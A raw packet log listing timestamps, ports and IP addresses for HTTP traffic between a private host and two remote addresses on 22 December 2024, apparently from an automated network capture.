Dec 22, 2024 02:16:52.414488077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.414925098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.414963007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415004969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415020943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415040970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415052891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415263891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415301085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415699959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415735006 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415798903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415815115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.415836096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.415847063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.416045904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.416081905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.416490078 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.416527987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.416572094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.416596889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.416610003 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.416632891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.416796923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.416835070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.417280912 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.417392015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.417407990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.417433977 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.417457104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.417726040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418085098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418127060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.418220997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418237925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418282032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.418355942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418394089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.418947935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418963909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.418981075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419003010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419024944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419172049 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419306040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419653893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419697046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419744015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419761896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419784069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419794083 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.419955969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.419991970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.420459032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.420519114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.420566082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.420583010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.420603037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.420612097 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.420787096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.420824051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.421231985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.421269894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.421293974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.421312094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.421329975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.421344042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.421562910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.421600103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.421984911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422022104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.422080994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422097921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422135115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.422332048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422822952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422863007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422863960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.422879934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.422899008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.422920942 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.423156023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.423190117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.423655033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.423671961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.423686981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.423691988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.423702002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.423722029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.423883915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.423921108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.424380064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.424413919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.424432039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.424448013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.424470901 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.424480915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.424695969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425215006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425230026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425246000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425255060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.425276041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.425297022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.425443888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425925970 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.425966024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.426008940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426026106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426064968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.426350117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426795959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426812887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426829100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.426832914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.426841974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.426866055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.427016020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.427479982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.427515984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.427575111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.427589893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.427625895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.427823067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.427858114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.428278923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.428406000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.428421974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.428446054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.428463936 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.428694010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.429059982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.429100990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.429145098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.429158926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.429197073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.439240932 CET	80	49877	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:52.442085981 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:52.452574015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452655077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452668905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452706099 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.452717066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.452832937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452944040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452960014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.452985048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.453011990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.453450918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.453546047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.453587055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.602801085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.602819920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.602840900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.602873087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.602967978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.602967978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603040934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603058100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603075027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603100061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603113890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603358984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603399038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603473902 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603490114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603512049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603523016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.603703976 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.603741884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604314089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604338884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604353905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604355097 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604373932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604386091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604693890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604732037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604782104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604799032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.604820013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604830027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.604991913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.605031967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.605566978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.605583906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.605601072 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.605623960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.605653048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.605823040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.606065035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.606204987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.606245041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.606270075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.606287003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.606312037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.606323004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.606595993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.606990099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607033968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.607079983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607098103 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607136965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.607294083 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607333899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.607767105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607825041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.607850075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607867002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.607892036 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.607908964 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.608078957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.608123064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.608558893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.608637094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.608652115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.608681917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.608709097 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.608855963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.609365940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.609416008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.609428883 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.609446049 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.609488010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.609674931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.609740973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.610148907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610217094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610232115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610260963 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.610290051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.610477924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610522032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.610912085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610956907 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.610971928 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.610987902 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.611031055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.611215115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.611267090 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.611686945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.611767054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.611771107 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.611787081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.611812115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.611826897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.612024069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.612462997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.612509966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.612554073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.612571001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.612617016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.612809896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.612927914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.613226891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.613322973 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.613339901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.613365889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.613390923 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.613564968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.613864899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614063025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614108086 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614120007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614136934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614168882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614181042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614335060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614377975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614846945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614903927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614919901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.614943981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.614955902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.615205050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.615304947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.615658998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.615695000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.615710020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.615711927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.615726948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.615753889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.615947008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.616077900 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.616391897 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.616436005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.616477966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.616493940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.616519928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.616530895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.616720915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.617180109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.617227077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.617271900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.617288113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.617331028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.617822886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.617867947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618061066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618077040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618093967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618128061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618143082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618736982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618753910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618787050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618796110 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618829012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618844986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.618868113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.618882895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.619360924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.619424105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.619626045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.619642019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.619657993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.619684935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.619709969 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.620305061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.620321035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.620356083 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.620364904 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.620398045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.620414972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.620454073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.621136904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.621153116 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.621187925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.621225119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.621231079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.621247053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.621292114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.644994020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645010948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645025969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645096064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.645153999 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645270109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645287037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.645330906 CET	49872	80	192.168.2.4	31.41.244.11
